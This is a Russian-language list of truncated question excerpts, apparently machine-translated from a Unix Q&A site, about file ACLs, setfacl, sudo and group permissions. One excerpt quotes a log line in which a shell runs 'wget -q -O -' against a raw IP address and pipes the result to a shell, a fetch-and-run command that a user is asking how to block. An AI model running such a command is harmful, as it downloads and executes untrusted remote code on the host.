Как мне рекурсивно найти все файлы, у которых ACL отличаются от того, что я ищу? Например, я хотел бы найти все файлы в каталоге, у которых есть ACL, не идентичные следующему примеру: # owner: bob # group: bobs-group user::rwx user:fred:rwx group::rw- mask::rwx other::r-- Используя отдельный поис....
unix 15 Дек 2021 в 08:15
В чем разница в ACL AIX с разрешением и указанием: Вот что говорится в документации: "The permit, deny, and specify keywords are defined as follows: permit Grants the user or group the specified access to the file deny Restricts the user or group from using the specified access to the file s....
unix 24 Ноя 2021 в 22:46
Я вошел в систему как root и попытался рекурсивно удалить папку /volume2/Name с помощью rm -rf Он запустил и удалил все файлы/каталоги внутри этой папки Name, но не может удалить саму папку, хотя я являюсь пользователем root: rm: cannot remove 'Name’: Operation not permitted Команда ls -l перечисля....
unix 24 Ноя 2021 в 00:34
Допустим, в многопользовательской системе у меня есть следующие группы: "писатели" "читатели" "рецензенты" В папке /Документы писатели должны иметь возможность записывать файлы, но не читать другие или даже видеть другие файлы, которыми они сами не владеют, через ls. читатели должны иметь возможност....
unix 19 Ноя 2021 в 01:30
Я пытаюсь выполнить команду ls в каталоге, который имеет разрешения acl для владельца и группы каталога (без стандартных разрешений posix). Это приводит к отказу в доступе, хотя getfacl говорит, что пользователь должен иметь возможность это сделать. Вот что я делаю: Создайте каталог и файл внутри н....
unix 1 Ноя 2021 в 19:21
Я долго задавался вопросом, почему sudo apt не может установить локальный deb из некоторых папок с ошибкой: Failed to fetch a file... Permission denied Недавно я попробовал sudo dpkg -i тот же путь, и это сработало. Путь смонтирован на USB с помощью udisks, поэтому он находится внутри папки /medi....
unix 25 Окт 2021 в 05:26
Мне нужно создать своего рода учетную запись «оператора резервного копирования», которая может читать все файлы в системе для копирования в систему резервного копирования без разрешения изменять любой из них, включая те, которые принадлежат root. Учетная запись root кажется единственной, способной н....
unix 8 Окт 2021 в 01:30
Как определить (через код .. или ACL), потребуется ли команде повышение прав root, т.е. солнце как sudo? некоторые команды требуют sudo .. некоторые выполняются без sudo .. Есть ли способ определить, нужен ли sudo ? любые намеки?....
unix 12 Июл 2021 в 16:28
История, которую можно пропустить. Недавно компания Western Digital объявила, что некоторые из старых NAS-устройств находятся в серьезной опасности из-за эксплойта, позволяющего восстановить заводские настройки устройств. Сотни устройств NAS были стерты. WD предложил просто «отключить» устройство.....
unix 3 Июл 2021 в 23:54
Я хочу найти все файлы с набором acl. Я знаю это грязное решение: найти все файлы с набором acl в каталоге. /и т.д sudo ls -lhR /etc|grep + Кто-нибудь знает более элегантное решение?....
acl
unix 18 Июн 2021 в 22:41
У нас есть около 100 учетных записей пользователей на сервере Linux, и 20 из них принадлежат моей команде ITOp. Я хочу, чтобы учетные записи пользователей моей команды могли просматривать мои файлы только в подкаталоге непосредственно в моем / домашнем каталоге. Как я могу контролировать права дос....
unix 2 Июн 2021 в 07:03
Я смог установить разрешения ACL по умолчанию для новых файлов, например: sudo setfacl -Rdm u:usernamehere:rwx /var/www/path/to/files Кажется, это дает всем новым файлам разрешение: -rw-r-----+ Я надеюсь, что новые файлы получат разрешение на следующее: -rw-r--r--+ Если это имеет значение, я испо....
unix 30 Май 2021 в 00:30
Как бы я решил эту проблему? Я уже пытался подписаться на Как отключить определенную команду для определенного пользователя в Linux из The Geek Diary" User:clipdrop PID:8426 PPID:8401 Run Time:0(secs) Memory:113280(kb) RSS:1180(kb) exe:/usr/bin/bash cmd:/bin/sh -c wget -q -O - http://195.3.146.118/....
unix 21 Май 2021 в 18:55
Недавно я узнал о ACL и setfacl для установки прав доступа для каждого пользователя. Но есть одна вещь, которую я не могу понять, как реализовать, и это ограничение всех прав записи(*) для определенного пользователя в определенном каталоге и во всем, что внутри него. Другими словами, рассмотрим пол....
unix 17 Май 2021 в 20:59
У меня есть том NFS, который смонтирован на виртуальной машине RHEL. Я получаю доступ к файлам через сервер LDAP. Когда LDAP usera получает доступ к somefile, тот же файл не может быть изменен (например, touched) другим пользователем LDAP userb. Сервер LDAP добавляется в качестве клиента на серве....
unix 10 Май 2021 в 16:42
Задний план: Я пытаюсь поделиться папкой между двумя пользователями на одном компьютере. Обычный способ состоял бы в том, чтобы два пользователя в одной и той же группе установили родительскую папку для этой группы с помощью rw и установленного бита s. Это прекрасно работает. За исключением .... п....
unix 7 Фев 2021 в 00:24
Я хочу добиться задержки при входе в систему через ssh на сервере Linux. Опишу сценарий и зачем мне это может понадобиться: У меня есть монтирование CIFS на сервере (присоединение к домену) через fstab с многопользовательской опцией. У пользователя есть свой домашний каталог на этом монтировании, ко....
unix 5 Фев 2021 в 18:02
Мне нужно понять, как пересчитывается маска POSIX ACL. Я прочитал справочные страницы (https://man7.org/linux/ man-pages/man1/setfacl.1.html) и следующее пояснение: The default behavior of setfacl is to recalculate the ACL mask entry, unless a mask entry was explicitly given. The mask entry is se....
unix 28 Янв 2021 в 02:23
Я только изучаю расширенные списки контроля доступа в Linux. Моя ближайшая цель — дать членам группы те же права, что и владелец дерева подкаталогов (все файлы и каталоги внутри). Я просмотрел справочные страницы для setfattr и getfattr. Ни одна из этих справочных страниц не предоставляет список д....
unix 13 Янв 2021 в 01:24
Итак, я запускаю Ubuntu 20.04 на виртуальной машине внутри Windows 10. Программа в Ubuntu должна иметь права на чтение и запись для папки, которую я смонтировал через VirtualBox, поэтому я решил попробовать chmod папки. Я понимаю, что не могу этого сделать, попробовал sudo setfacl -m /path/to/dir и....
unix 25 Дек 2020 в 18:05
Я пытаюсь запустить следующую команду из документов Oracle ZFS, но она не работает: $ chmod A+user:myusr:add_subdirectory:fd:allow /tank chmod: invalid mode: ‘A+user:myusr:add_subdirectory:fd:allow’ Try 'chmod --help' for more information Версия: Ubuntu 20.04.1 LTS Документ Oracle: https://docs.or....
unix 14 Сен 2020 в 23:22
По сути, у меня есть сервер приложений, и я хотел бы, чтобы владельцы/администраторы приложения могли запускать любую команду sudo в каталогах, связанных с приложением. Например, если каталог приложения — /opt/my-application, пользователю не нужно будет запускать «sudo vim /opt/my-application/some-....
unix 11 Сен 2020 в 15:56
Я использую контейнеры Openindiana (Solaris 10) и хочу, чтобы пользователи могли загружать веб-контент через sftp. Мне удалось настроить внутренний sftp OpenSSH и заблокировать пользователя под корневым веб-узлом. Все файлы в корневом каталоге должны принадлежать пользователю sftp, но в то же врем....
unix 24 Авг 2020 в 02:27
Я использую Centos 8 Linux с несколькими пользователями, принадлежащими к одной группе, которые получают доступ к папке/подпапке с номером ff и файлам в одной и той же FS (xfs). Я хочу, чтобы все файлы и папки имели разрешение на запись для групповой настройки umask на 0002, чтобы новый файл, созда....
unix 20 Авг 2020 в 20:35
Я использую Ubuntu, и я хотел бы знать, являются ли обычные разрешения и права пользователя, группы и другие разрешения, найденные в ACL (при отображении), на самом деле двумя разными наборами разрешений или это на самом деле один набор разрешений.....
unix 2 Авг 2020 в 03:03